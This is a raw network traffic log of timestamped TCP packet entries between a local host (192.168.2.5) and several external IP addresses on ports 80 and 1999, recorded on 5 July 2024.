                Jul 5, 2024 07:13:39.148338079 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.148349047 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.148363113 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.148386002 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.148397923 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.148490906 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.148500919 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.148536921 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.148549080 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.148605108 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.148616076 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.148626089 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.148637056 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.148648977 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.148658991 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.148698092 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.148978949 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.148991108 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.148999929 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.149012089 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.149022102 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.149032116 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.149034023 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.149051905 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.149070024 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.149311066 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.149358034 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.149375916 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.149388075 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.149399996 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.149422884 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.149440050 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.149657011 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.149667978 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.149677992 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.149688005 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.149699926 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.149708033 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.149713993 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.149729967 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.149740934 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.149764061 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.150114059 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.150125027 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.150135040 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.150151014 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.150162935 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.150163889 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.150173903 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.150186062 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.150191069 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.150198936 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.150199890 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.150223017 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.150243998 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.152199984 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.152254105 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.152281046 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.152318954 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.152323961 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.152360916 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.152380943 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.152393103 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.152429104 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.152529001 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.152539968 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.152549982 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.152563095 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.152575970 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.152586937 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.152611971 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.152821064 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.152832985 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.152842999 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.152853012 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.152863026 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.152870893 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.152873993 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.152887106 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.152894020 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.152899981 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.152914047 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.152937889 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.152961016 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.153145075 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.153192043 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.153223038 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.153234959 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.153266907 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.153306961 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.153317928 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.153429031 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.153445005 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.153491020 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.153521061 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.153532028 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.153568983 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.153618097 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.153635025 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.153646946 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.153672934 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.153702021 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.153800011 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.153811932 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.153820992 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.153868914 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.153868914 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.399852991 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.399888992 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.399899006 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.399916887 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.399946928 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.399972916 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.399983883 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.399992943 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.400017977 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.400031090 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.400177002 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.400188923 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.400198936 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.400222063 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.400240898 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.400356054 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.400367022 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.400399923 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.400501013 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.400512934 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.400521994 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.400532007 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.400541067 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.400547028 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.400552034 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.400569916 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.400582075 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.400932074 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.400943995 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.400952101 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.400963068 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.400974035 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.400979042 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.400984049 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.400993109 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.400995970 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.401006937 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.401009083 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.401017904 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.401032925 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.401057005 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.401428938 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.401441097 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.401474953 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.401578903 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.401590109 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.401599884 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.401638031 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.401638031 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.401684999 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.401695967 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.401705027 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.401715040 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.401731014 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.401734114 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.401743889 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.401757002 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.401757956 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.401767969 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.401776075 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.401781082 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.401798964 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.401819944 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.402542114 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.402551889 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.402559996 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.402565002 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.402574062 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.402589083 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.402592897 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.402599096 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.402601957 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.402610064 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.402620077 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.402626991 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.402631044 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.402642012 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.402652025 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.402653933 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.402662039 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.402668953 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.402673960 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.402693033 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.402717113 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.403475046 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.403486967 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.403496027 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.403506994 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.403517962 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.403525114 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.403529882 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.403536081 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.403543949 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.403553963 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.403554916 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.403565884 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.403577089 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.403577089 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.403589010 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.403599977 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.403601885 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.403611898 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.403614998 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.403635979 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.403657913 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.404412985 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.404424906 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.404433966 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.404444933 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.404460907 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.404460907 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.404473066 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.404494047 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.404503107 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.404503107 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.404505014 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.404515982 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.404521942 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.404529095 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.404539108 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.404541016 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.404551983 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.404555082 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.404563904 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.404572964 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.404583931 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.404597044 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.404608011 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.405360937 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.405374050 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.405385017 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.405397892 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.405410051 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.405411005 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.405421972 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.405432940 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.405442953 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.405447960 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.405456066 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.405467987 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.405476093 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.405483961 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.405483961 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.405498028 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.405509949 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.405520916 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.405524015 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.405563116 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.405575991 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.406297922 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.406311989 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.406322002 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.406332970 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.406343937 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.406348944 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.406357050 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.406368971 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.406372070 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.406380892 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.406393051 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.406404018 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.406405926 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.406416893 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.406426907 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.406430006 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.406444073 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.406447887 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.406455994 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.406466961 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.406500101 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.407114983 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.407134056 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.407144070 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.407156944 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.407169104 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.407176971 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.407181978 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.407190084 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.407212019 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.407234907 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.494153023 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.494230032 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.653062105 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.653100967 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.653114080 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.653132915 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.653151989 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.653259993 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.653270960 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.653280973 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.653291941 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.653304100 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.653310061 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.653326988 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.653342009 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.653623104 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.653635025 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.653644085 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.653655052 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.653665066 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.653673887 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.653675079 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.653700113 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.653719902 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.746922016 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.746973038 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:42.080499887 CEST645451999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:42.085385084 CEST199964545103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:42.085459948 CEST645451999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:42.090737104 CEST645451999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:42.095496893 CEST199964545103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:43.081737041 CEST199964545103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:43.123523951 CEST645451999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:43.395701885 CEST199964545103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:43.400065899 CEST645451999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:43.404902935 CEST199964545103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:43.406738043 CEST645451999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:43.411611080 CEST199964545103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:44.180275917 CEST199964545103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:44.233104944 CEST645451999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:44.234235048 CEST645451999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:44.239100933 CEST199964545103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:44.489770889 CEST199964545103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:44.491673946 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:44.496591091 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:44.496680021 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:44.500586987 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:44.505352974 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:44.512233019 CEST6454780192.168.2.5178.237.33.50
                Jul 5, 2024 07:13:44.517153978 CEST8064547178.237.33.50192.168.2.5
                Jul 5, 2024 07:13:44.517234087 CEST6454780192.168.2.5178.237.33.50
                Jul 5, 2024 07:13:44.517435074 CEST6454780192.168.2.5178.237.33.50
                Jul 5, 2024 07:13:44.522214890 CEST8064547178.237.33.50192.168.2.5
                Jul 5, 2024 07:13:44.529773951 CEST645451999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:45.140240908 CEST8064547178.237.33.50192.168.2.5
                Jul 5, 2024 07:13:45.140297890 CEST6454780192.168.2.5178.237.33.50
                Jul 5, 2024 07:13:45.161081076 CEST645451999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:45.165946007 CEST199964545103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:45.502269983 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:45.545408964 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:45.806333065 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:45.810776949 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:45.815535069 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:45.815584898 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:45.820388079 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:46.164524078 CEST8064547178.237.33.50192.168.2.5
                Jul 5, 2024 07:13:46.164587975 CEST6454780192.168.2.5178.237.33.50
                Jul 5, 2024 07:13:46.472400904 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:46.472475052 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:46.472491980 CEST199964546103.237.87.32192.168.2.5
